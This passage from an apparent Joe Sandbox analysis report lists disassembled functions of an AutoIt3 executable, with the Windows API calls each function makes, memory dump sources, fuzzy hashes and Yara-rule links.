                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00865829
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00865831
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0086583B
                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00865877
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                      • String ID:
                                      • API String ID: 2833360925-0
                                      • Opcode ID: 93bf70ea78a8da3f1dc18a05fb0a46717b27714ac5aef8ff5f56de6f35c6a600
                                      • Instruction ID: 57e75ede6626ed6f238a84734a7e52690de5461f3233173458f8d7bb7379da60
                                      • Opcode Fuzzy Hash: 93bf70ea78a8da3f1dc18a05fb0a46717b27714ac5aef8ff5f56de6f35c6a600
                                      • Instruction Fuzzy Hash: AB011731D01A1D9BDF04AFE9D8499EEBBB8FB08B11F064566E601F3540DB309550CBA5
                                      Function 00857D28 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857C62,80070057,?,?,?,00858073), ref: 00857D45
                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857C62,80070057,?,?), ref: 00857D60
                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857C62,80070057,?,?), ref: 00857D6E
                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857C62,80070057,?), ref: 00857D7E
                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857C62,80070057,?,?), ref: 00857D8A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                      • String ID:
                                      • API String ID: 3897988419-0
                                      • Opcode ID: b969089c1765a2f0e480201c44b2185ff5b56193e37cc7d45c9c9d21f2023138
                                      • Instruction ID: aa6b1b9ccac8c5503b628cccfeb88d5f0201668ca6873bfae4b2224f6ed0c91e
                                      • Opcode Fuzzy Hash: b969089c1765a2f0e480201c44b2185ff5b56193e37cc7d45c9c9d21f2023138
                                      • Instruction Fuzzy Hash: E701BC72601218AFDB105F14EC04BAA7BBEFF48392F188029FC08E2214D771ED04CBA0
                                      Function 00858CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00858CDE
                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00858CE8
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00858CF7
                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00858CFE
                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00858D14
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 44706859-0
                                      • Opcode ID: 3936ac448a98a9d05e02f86047e02a6ec899350f06159317effc1e7d9e0e0de8
                                      • Instruction ID: 157448c537b6e40d8b434e4b1af537a51755f51b3d8ed6cf901b79f8fecdad3f
                                      • Opcode Fuzzy Hash: 3936ac448a98a9d05e02f86047e02a6ec899350f06159317effc1e7d9e0e0de8
                                      • Instruction Fuzzy Hash: E6F0A931200208AFEF102FA49C89E6B3BACFF89759B14412AF945D31A0CA60AC04DF60
                                      Function 00858D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00858D3F
                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00858D49
                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00858D58
                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00858D5F
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00858D75
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 44706859-0
                                      • Opcode ID: 9d862269caaf9526d444f58a66ba1d82d072361b31e8a3a483aab9e19ca2821c
                                      • Instruction ID: 4d3632425c7bdff72e7c003829361f92df38d0a74235b8716029ffdc8ae92bb3
                                      • Opcode Fuzzy Hash: 9d862269caaf9526d444f58a66ba1d82d072361b31e8a3a483aab9e19ca2821c
                                      • Instruction Fuzzy Hash: 3AF0AF31200204AFEB111FA4EC88F6B3BACFF49759F08011AF944D3190CB609D05DF60
                                      Function 0085CD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 0085CD90
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0085CDA7
                                      • MessageBeep.USER32(00000000), ref: 0085CDBF
                                      • KillTimer.USER32(?,0000040A), ref: 0085CDDB
                                      • EndDialog.USER32(?,00000001), ref: 0085CDF5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                      • String ID:
                                      • API String ID: 3741023627-0
                                      • Opcode ID: 87092dd8d35747f23a4f78e36a90100a80cedcd08c89aed1dc053b1c1e43c765
                                      • Instruction ID: 8b6558316e6e5f05cd47d8d134fcb729625babdd3c09e0ceb5c310989fbb1470
                                      • Opcode Fuzzy Hash: 87092dd8d35747f23a4f78e36a90100a80cedcd08c89aed1dc053b1c1e43c765
                                      • Instruction Fuzzy Hash: EC018631500708AFEB216B64DD4EBA67B78FF10706F04066AF982E10E1DBF1A9588F80
                                      Function 0080178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      • EndPath.GDI32(?), ref: 0080179B
                                      • StrokeAndFillPath.GDI32(?,?,0083BBC9,00000000,?), ref: 008017B7
                                      • SelectObject.GDI32(?,00000000), ref: 008017CA
                                      • DeleteObject.GDI32 ref: 008017DD
                                      • StrokePath.GDI32(?), ref: 008017F8
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                      • String ID:
                                      • API String ID: 2625713937-0
                                      • Opcode ID: 7b54bc77035681bdb26f5037dbdc5d65ab01b7b14841b5e01489b69afc5ff13a
                                      • Instruction ID: 40df34a7c8ee481c477b68f5ffc57040e67dc88cee2253e1199241290e6532c0
                                      • Opcode Fuzzy Hash: 7b54bc77035681bdb26f5037dbdc5d65ab01b7b14841b5e01489b69afc5ff13a
                                      • Instruction Fuzzy Hash: 7CF0C431008608EFDB616F26EC4CB693BB4FB00326F188225F939951F4C7318995DF15
                                      Function 0080E3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00820FE6: std::exception::exception.LIBCMT ref: 0082101C
                                        • Part of subcall function 00820FE6: __CxxThrowException@8.LIBCMT ref: 00821031
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                        • Part of subcall function 00811680: _memmove.LIBCMT ref: 008116DB
                                      • __swprintf.LIBCMT ref: 0080E598
                                      Strings
                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0080E431
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                      • API String ID: 1943609520-557222456
                                      • Opcode ID: 70a61a015bbf3b79fcd3dc9e10aa4ed1fc5ef44bd64adbb56cb0bf843a2686cb
                                      • Instruction ID: 0c0efd8a839c8181173b19d1342e621796bbf16774e4ebc940858aa2471ad8ef
                                      • Opcode Fuzzy Hash: 70a61a015bbf3b79fcd3dc9e10aa4ed1fc5ef44bd64adbb56cb0bf843a2686cb
                                      • Instruction Fuzzy Hash: 33919F711086159FCB14EF28DC95CAFB7A8FF95304F40091DF592D72A2EA20EE84CB92
                                      Function 0086BF7E Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00820284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00812A58,?,00008000), ref: 008202A4
                                      • CoInitialize.OLE32(00000000), ref: 0086BFFE
                                      • CoCreateInstance.OLE32(00893D3C,00000000,00000001,00893BAC,?), ref: 0086C017
                                      • CoUninitialize.OLE32 ref: 0086C034
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                      • String ID: .lnk
                                      • API String ID: 2126378814-24824748
                                      • Opcode ID: 57a39c8329d0cc73d29ba13f07adb1d24684ed674c4d93e3b66f3c027a149eeb
                                      • Instruction ID: 4e14701767edb8e5a71209ae31347d35f3f322f555564a81dfe292e53438373c
                                      • Opcode Fuzzy Hash: 57a39c8329d0cc73d29ba13f07adb1d24684ed674c4d93e3b66f3c027a149eeb
                                      • Instruction Fuzzy Hash: 23A147B52042019FCB00DF58C884D6AB7E5FF89314F058999F899DB3A2CB31ED45CB92
                                      Function 0082523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                      Download Yara Rule
                                      APIs
                                      • __startOneArgErrorHandling.LIBCMT ref: 008252CD
                                        • Part of subcall function 00830320: __87except.LIBCMT ref: 0083035B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorHandling__87except__start
                                      • String ID: pow
                                      • API String ID: 2905807303-2276729525
                                      • Opcode ID: e7e04b2272c8ae7f3efd102795eb0fb0c8ae0fbba2783761f9422d050aa71d80
                                      • Instruction ID: 069194bad840e2fe392dc257ffd9defec9efeb2da523baaf9bedf7f2e9508a69
                                      • Opcode Fuzzy Hash: e7e04b2272c8ae7f3efd102795eb0fb0c8ae0fbba2783761f9422d050aa71d80
                                      • Instruction Fuzzy Hash: 32519B60E4D606D7CB15B718E92137A2B94FB81759F344C58E4C1C63E9EE348DC49ECA
                                      Function 00820654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: #$+
                                      • API String ID: 0-2552117581
                                      • Opcode ID: 027e502b7c9c387061d06dcfbfee7de28a8f5924b2a173c8c6f67778ca624cd4
                                      • Instruction ID: cba0ee21ce3c9514420cf7bf00925958efef21b478011a52b07623d04e6fd792
                                      • Opcode Fuzzy Hash: 027e502b7c9c387061d06dcfbfee7de28a8f5924b2a173c8c6f67778ca624cd4
                                      • Instruction Fuzzy Hash: F0513375500259CFDF11DF68D880AFA7BA4FF69321F580065EC81DB291E731ACAACB61
                                      Function 0081CF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _memset$_memmove
                                      • String ID: ERCP
                                      • API String ID: 2532777613-1384759551
                                      • Opcode ID: c54f027689012ad4f0dc7a3a6d0d06cbc26ebf821e9e6ae60e0de5b1a76c8fc8
                                      • Instruction ID: 4f9e77353fed8ed78f5fbf8a20d433609c3c0eedd777ee704d9c9d11404cc34d
                                      • Opcode Fuzzy Hash: c54f027689012ad4f0dc7a3a6d0d06cbc26ebf821e9e6ae60e0de5b1a76c8fc8
                                      • Instruction Fuzzy Hash: 7E51B3B1A007099BDB24CF64C885BEABBE8FF18314F24856EE94ADB251E770D5C5CB50
                                      Function 0085A3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00861CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00859E4E,?,?,00000034,00000800,?,00000034), ref: 00861CE5
                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0085A3F7
                                        • Part of subcall function 00861C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00859E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00861CB0
                                        • Part of subcall function 00861BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00861C08
                                        • Part of subcall function 00861BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00859E12,00000034,?,?,00001004,00000000,00000000), ref: 00861C18
                                        • Part of subcall function 00861BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00859E12,00000034,?,?,00001004,00000000,00000000), ref: 00861C2E
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0085A464
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0085A4B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                      • String ID: @
                                      • API String ID: 4150878124-2766056989
                                      • Opcode ID: 725022d8595af6dc10f2edead7ad2a47580078bc6fc185b3de10f4bf2105cdb5
                                      • Instruction ID: 70bb2d2283485eb3df5fb939e97d6840c87fe53145e87a4f30ad686c0390c809
                                      • Opcode Fuzzy Hash: 725022d8595af6dc10f2edead7ad2a47580078bc6fc185b3de10f4bf2105cdb5
                                      • Instruction Fuzzy Hash: 92413D7290021CAFDF14DBA8CD85AEEBBB8FF45300F044195FA55B7181DA706E89CB62
                                      Function 00887F6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00890980,00000000,?,?,?,?), ref: 00888004
                                      • GetWindowLongW.USER32 ref: 00888021
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00888031
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$Long
                                      • String ID: SysTreeView32
                                      • API String ID: 847901565-1698111956
                                      • Opcode ID: fcb2dbe269d90912a950bb361dae83bd775f5566486f97eada80ec56d6e1f300
                                      • Instruction ID: 5ec5c57b170aca89cd669d9fd42969032d8d6e9d6fa140cfcbea2519ba76a85a
                                      • Opcode Fuzzy Hash: fcb2dbe269d90912a950bb361dae83bd775f5566486f97eada80ec56d6e1f300
                                      • Instruction Fuzzy Hash: E6319C31204609AEDB21AE38CC45BEA77A9FF49324F244325F975D32E0CB71E8549B60
                                      Function 008879FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00887A86
                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00887A9A
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00887ABE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window
                                      • String ID: SysMonthCal32
                                      • API String ID: 2326795674-1439706946
                                      • Opcode ID: a363bb5b4cbd6489e10f829296206a429948bb8599f35a1734912c3344ca2bcb
                                      • Instruction ID: e28a3c385203f0461a7af067156bb10c16b99a4fead320855c1aa8fae7b6cf20
                                      • Opcode Fuzzy Hash: a363bb5b4cbd6489e10f829296206a429948bb8599f35a1734912c3344ca2bcb
                                      • Instruction Fuzzy Hash: EE218D32610229AFDF159F54CC86FEE3B79FB48724F250214FE15AB1D0DAB1E8509BA0
                                      Function 008881B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0088826F
                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0088827D
                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00888284
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$DestroyWindow
                                      • String ID: msctls_updown32
                                      • API String ID: 4014797782-2298589950
                                      • Opcode ID: 82b56dcd270ff6becff81e57f9739d1ef26fbbe6d8b16c2f74bf4aa00af4d202
                                      • Instruction ID: 8a963637191f04c826a088e7d9a6ab3ae0653342b1af41cb05019994a0693c39
                                      • Opcode Fuzzy Hash: 82b56dcd270ff6becff81e57f9739d1ef26fbbe6d8b16c2f74bf4aa00af4d202
                                      • Instruction Fuzzy Hash: 20217AB5604209AFDB10EF58DC85DA737ADFB5A3A4B480059FA11DB2A1CB70EC11CBA0
                                      Function 008872D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00887360
                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00887370
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00887395
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
